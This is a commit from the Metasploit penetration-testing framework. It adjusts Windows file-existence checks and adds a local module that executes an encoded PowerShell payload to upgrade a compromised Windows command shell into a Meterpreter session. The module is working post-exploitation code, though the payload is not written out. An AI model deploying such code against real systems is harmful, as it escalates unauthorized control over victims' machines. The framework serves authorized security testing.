Land #2936 - Windows Command Shell Upgrade (Powershell)

bug/bundler_fix
sinn3r 2014-02-07 17:39:06 -06:00
commit bd23fcf4b7
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
2 changed files with 61 additions and 16 deletions

View File

@ -41,15 +41,16 @@ module Msf::Post::File
return stat.directory?
else
if session.platform =~ /win/
# XXX
f = cmd_exec("cmd.exe /C IF exist \"#{path}\\*\" ( echo true )")
else
f = session.shell_command_token("test -d '#{path}' && echo true")
end
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
end
end
#
# Expand any environment variables to return the full path specified by +path+.
@ -72,24 +73,19 @@ module Msf::Post::File
return stat.file?
else
if session.platform =~ /win/
out = session.shell_command_token("type \"#{path}\"").to_s.strip
# Possible error messages when opening a file, see:
# http://technet.microsoft.com/en-us/library/cc956687.aspx
if out =~ /^The system cannot find the path specified/
return false
elsif out =~ /^The filename, directory name, or volume label syntax is incorrect/
return false
else
return true
f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
if f =~ /true/
f = cmd_exec("cmd.exe /C IF exist \"#{path}\\\\\" ( echo false ) ELSE ( echo true )")
end
else
f = session.shell_command_token("test -f '#{path}' && echo true")
end
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
end
end
alias file_exist? file?

View File

@ -0,0 +1,49 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Command Shell Upgrade (Powershell)',
'Description' => %q{
This module executes Powershell to upgrade a Windows Shell session
to a full Meterpreter session.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'shell' ],
'Targets' => [ [ 'Universal', {} ] ],
'DefaultTarget' => 0
))
end
def exploit
psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
if file? "%WINDIR%\\System32#{psh_path}"
print_status("Executing powershell command line...")
cmd_exec(cmd_psh_payload(payload.encoded))
else
fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
end
end
end